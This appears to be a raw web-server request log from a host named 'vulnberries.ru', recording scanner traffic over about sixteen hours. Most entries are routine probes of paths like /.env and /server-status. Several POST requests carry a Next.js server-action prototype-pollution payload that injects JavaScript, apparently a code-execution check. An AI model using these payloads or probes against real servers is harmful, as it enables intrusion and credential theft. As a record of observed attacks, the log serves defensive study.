RemoteAddr: 172.30.0.12:41704
Path: /about
URL: /about
Method: GET
[2026-04-08 14:33:59] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /server-status
URL: /server-status
Method: GET
[2026-04-08 14:33:57] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /server
URL: /server
Method: GET
[2026-04-08 14:33:56] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /console/
URL: /console/
Method: GET
[2026-04-08 14:33:55] === HTTP Request ===
[2026-04-08 14:33:54] Main page accessed - IP: 172.30.0.12:41704
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 165.227.84.14
Via: 1.1 Caddy
User-Agent: Mozilla/5.0 (l9scan/2.0.8333e2139313e2334313e25393; +https://leakix.net)
Accept-Encoding: gzip
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:41704
Path: /
URL: /
Method: GET
[2026-04-08 14:33:54] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 209.99.186.108:50648
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-08 14:12:14] === HTTP Request ===
[2026-04-08 14:12:01] Main page accessed - IP: 209.99.186.108:59462
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 209.99.186.108:59462
Path: /
URL: /
Method: GET
[2026-04-08 14:12:01] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.188:46910
Path: /ext-js/app/common/zld_product_spec.js
URL: /ext-js/app/common/zld_product_spec.js
Method: GET
[2026-04-08 14:06:02] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.198:55838
Path: /css/images/PTZOptics_powerby.png
URL: /css/images/PTZOptics_powerby.png
Method: GET
[2026-04-08 14:06:02] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.198:39870
Query: type=rau
Path: /Telerik.Web.UI.WebResource.axd
URL: /Telerik.Web.UI.WebResource.axd?type=rau
Method: GET
[2026-04-08 14:05:53] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.197:40910
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-08 14:05:46] === HTTP Request ===
[2026-04-08 14:05:37] Login page accessed - IP: 45.156.129.198:47398
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.198:47398
Path: /login
URL: /login
Method: GET
[2026-04-08 14:05:37] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.197:56146
Path: /webfig/
URL: /webfig/
Method: GET
[2026-04-08 14:05:29] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.197:39610
Path: /wp-json
URL: /wp-json
Method: GET
[2026-04-08 14:05:14] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.188:38980
Path: /license.txt
URL: /license.txt
Method: GET
[2026-04-08 14:04:53] === HTTP Request ===
[2026-04-08 14:04:53] Main page accessed - IP: 45.156.129.198:49954
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.198:49954
Path: /
URL: /
Method: GET
[2026-04-08 14:04:53] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.188:56984
Path: /api/session/properties
URL: /api/session/properties
Method: GET
[2026-04-08 14:04:23] === HTTP Request ===
[2026-04-08 14:03:47] Main page accessed - IP: 45.156.129.197:41030
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.197:41030
Path: /
URL: /
Method: GET
[2026-04-08 14:03:47] === HTTP Request ===
[2026-04-08 13:59:22] Main page accessed - IP: 205.210.31.213:57726
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: static.vulnberries.ru
RemoteAddr: 205.210.31.213:57726
Path: /
URL: /
Method: GET
[2026-04-08 13:59:22] === HTTP Request ===
===================
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Platform: "macOS"
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Pragma: no-cache
Accept-Encoding: gzip
Sec-Fetch-Dest: document
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en;q=0.9
Sec-Fetch-Site: none
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 123.160.223.75:11628
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-08 13:57:37] === HTTP Request ===
[2026-04-08 13:57:26] Main page accessed - IP: 123.160.223.74:7167
===================
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Cache-Control: no-cache
Pragma: no-cache
Accept-Language: en;q=0.9
Accept-Encoding: gzip
Sec-Fetch-User: ?1
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 123.160.223.74:7167
Path: /
URL: /
Method: GET
[2026-04-08 13:57:26] === HTTP Request ===
[2026-04-08 13:53:36] Main page accessed - IP: 172.30.0.12:59616
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 34.241.28.156
Via: 1.0 Caddy
User-Agent: Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)
Accept-Encoding: gzip
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:59616
Path: /
URL: /
Method: GET
[2026-04-08 13:53:36] === HTTP Request ===
[2026-04-08 13:37:57] Main page accessed - IP: 89.110.97.157:50390
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.110.97.157:50390
Path: /
URL: /
Method: GET
[2026-04-08 13:37:57] === HTTP Request ===
[2026-04-08 13:22:05] Main page accessed - IP: 147.185.132.19:60822
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: warehouse.vulnberries.ru
RemoteAddr: 147.185.132.19:60822
Path: /
URL: /
Method: GET
[2026-04-08 13:22:05] === HTTP Request ===
[2026-04-08 12:41:54] Main page accessed - IP: 35.187.13.22:38796
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.187.13.22:38796
Path: /
URL: /
Method: GET
[2026-04-08 12:41:54] === HTTP Request ===
[2026-04-08 12:41:33] Main page accessed - IP: 66.228.53.136:59280
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.228.53.136:59280
Path: /
URL: /
Method: GET
[2026-04-08 12:41:33] === HTTP Request ===
[2026-04-08 12:09:10] Main page accessed - IP: 198.235.24.219:58262
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 198.235.24.219:58262
Path: /
URL: /
Method: GET
[2026-04-08 12:09:10] === HTTP Request ===
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.46.245:32110
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-04-08 12:05:22] === HTTP Request ===
===================
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Connection: close
Referer: http://95.143.191.38:8081
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.46.245:31670
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-08 12:05:22] === HTTP Request ===
[2026-04-08 12:05:21] Main page accessed - IP: 118.193.46.245:31614
===================
Connection: close
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.46.245:31614
Path: /
URL: /
Method: GET
[2026-04-08 12:05:21] === HTTP Request ===
[2026-04-08 12:05:20] Main page accessed - IP: 118.193.46.245:31574
===================
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.46.245:31574
Path: /
URL: /
Method: GET
[2026-04-08 12:05:20] === HTTP Request ===
[2026-04-08 11:54:41] Main page accessed - IP: 47.250.84.32:58930
===================
Connection: close
Accept-Encoding: gzip
User-Agent: curl/7.74.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 47.250.84.32:58930
Path: /
URL: /
Method: GET
[2026-04-08 11:54:41] === HTTP Request ===
[2026-04-08 11:54:38] Main page accessed - IP: 47.250.84.32:58926
===================
Accept: */*
User-Agent: curl/7.64.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 47.250.84.32:58926
Path: /
URL: /
Method: GET
[2026-04-08 11:54:38] === HTTP Request ===
[2026-04-08 11:10:41] Main page accessed - IP: 198.235.24.229:57348
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: serve.vulnberries.ru
RemoteAddr: 198.235.24.229:57348
Path: /
URL: /
Method: GET
[2026-04-08 11:10:41] === HTTP Request ===
[2026-04-08 10:55:45] Main page accessed - IP: 185.247.137.139:54835
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: ch.bakunin.me:8081
RemoteAddr: 185.247.137.139:54835
Path: /
URL: /
Method: GET
[2026-04-08 10:55:45] === HTTP Request ===
[2026-04-08 10:23:57] Main page accessed - IP: 205.210.31.226:59440
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru
RemoteAddr: 205.210.31.226:59440
Path: /
URL: /
Method: GET
[2026-04-08 10:23:57] === HTTP Request ===
[2026-04-08 10:01:05] Main page accessed - IP: 198.235.24.254:60848
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: _dmarc.vulnberries.ru
RemoteAddr: 198.235.24.254:60848
Path: /
URL: /
Method: GET
[2026-04-08 10:01:05] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:6514
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-08 09:41:24] === HTTP Request ===
[2026-04-08 08:19:55] Main page accessed - IP: 147.185.132.141:57742
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: kqkpgadmin.vulnberries.ru
RemoteAddr: 147.185.132.141:57742
Path: /
URL: /
Method: GET
[2026-04-08 08:19:55] === HTTP Request ===
===================
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:40394
Path: /jars
URL: /jars
Method: GET
[2026-04-08 07:45:36] === HTTP Request ===
[2026-04-08 07:13:37] Main page accessed - IP: 34.38.252.90:49046
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.38.252.90:49046
Path: /
URL: /
Method: GET
[2026-04-08 07:13:37] === HTTP Request ===
[2026-04-08 06:35:17] Main page accessed - IP: 66.228.62.150:48491
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 66.228.62.150:48491
Path: /
URL: /
Method: GET
[2026-04-08 06:35:17] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37128
Path: /.env
URL: /.env
Method: GET
[2026-04-08 06:04:17] === HTTP Request ===
[2026-04-08 05:23:16] Main page accessed - IP: 198.235.24.225:57732
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru
RemoteAddr: 198.235.24.225:57732
Path: /
URL: /
Method: GET
[2026-04-08 05:23:16] === HTTP Request ===
[2026-04-08 05:15:10] Main page accessed - IP: 147.185.132.192:58754
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: cdn.vulnberries.ru
RemoteAddr: 147.185.132.192:58754
Path: /
URL: /
Method: GET
[2026-04-08 05:15:10] === HTTP Request ===
[2026-04-08 04:34:12] Main page accessed - IP: 173.255.221.189:52411
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 173.255.221.189:52411
Path: /
URL: /
Method: GET
[2026-04-08 04:34:12] === HTTP Request ===
[2026-04-08 04:08:01] Main page accessed - IP: 176.65.149.45:36072
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:36072
Path: /
URL: /
Method: GET
[2026-04-08 04:08:01] === HTTP Request ===
===================
------WebKitFormBoundaryx604297579825--
------WebKitFormBoundaryx604297579825
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx604297579825
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 77412+true+7806252;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx604297579825
X-Nextjs-Html-Request-Id: ilovepoop_604297579825
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx604297579825
Content-Length: 517
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:56680
Path: /api/route
URL: /api/route
Method: POST
[2026-04-08 02:46:30] === HTTP Request ===
===================
------WebKitFormBoundaryx1434069160562--
------WebKitFormBoundaryx1434069160562
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1434069160562
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 245731+true+5835931;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1434069160562
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1434069160562
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1434069160562
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:56678
Path: /app
URL: /app
Method: POST
[2026-04-08 02:46:30] === HTTP Request ===
===================
------WebKitFormBoundaryx34308130591--
------WebKitFormBoundaryx34308130591
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx34308130591
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 247587+true+138570;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx34308130591
X-Nextjs-Html-Request-Id: ilovepoop_34308130591
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 513
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx34308130591
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:56676
Path: /_next/server
URL: /_next/server
Method: POST
[2026-04-08 02:46:29] === HTTP Request ===
===================
------WebKitFormBoundaryx580962309076--
------WebKitFormBoundaryx580962309076
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx580962309076
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 74749+true+7772175;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx580962309076
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx580962309076
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_580962309076
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:56672
Path: /api
URL: /api
Method: POST
[2026-04-08 02:46:29] === HTTP Request ===
===================
------WebKitFormBoundaryx475763575414--
------WebKitFormBoundaryx475763575414
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx475763575414
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 202727+true+2346819;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx475763575414
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_475763575414
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx475763575414
Next-Action: x
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:56668
Path: /_next
URL: /_next
Method: POST
[2026-04-08 02:46:28] === HTTP Request ===
[2026-04-08 02:46:27] Main page accessed - IP: 45.205.1.26:56658
===================
------WebKitFormBoundaryx1419665703271--
------WebKitFormBoundaryx1419665703271
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1419665703271
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 196530+true+7223659;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1419665703271
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_1419665703271
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1419665703271
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:56658
Path: /
URL: /
Method: POST
[2026-04-08 02:46:27] === HTTP Request ===
[2026-04-08 01:14:40] Main page accessed - IP: 20.65.194.160:55934
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.65.194.160:55934
Path: /
URL: /
Method: GET
[2026-04-08 01:14:40] === HTTP Request ===
===================
Accept: */*
User-Agent: curl/7.61.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.217:33955
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-07 23:33:37] === HTTP Request ===
[2026-04-07 23:33:37] Main page accessed - IP: 104.152.52.217:38459
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.217:38459
Path: /
URL: /
Method: GET
[2026-04-07 23:33:37] === HTTP Request ===
[2026-04-07 23:29:35] Main page accessed - IP: 137.184.32.56:51956
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 137.184.32.56:51956
Path: /
URL: /
Method: GET
[2026-04-07 23:29:35] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:22172
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-07 22:40:51] === HTTP Request ===
===================
Connection: close
Accept: */*
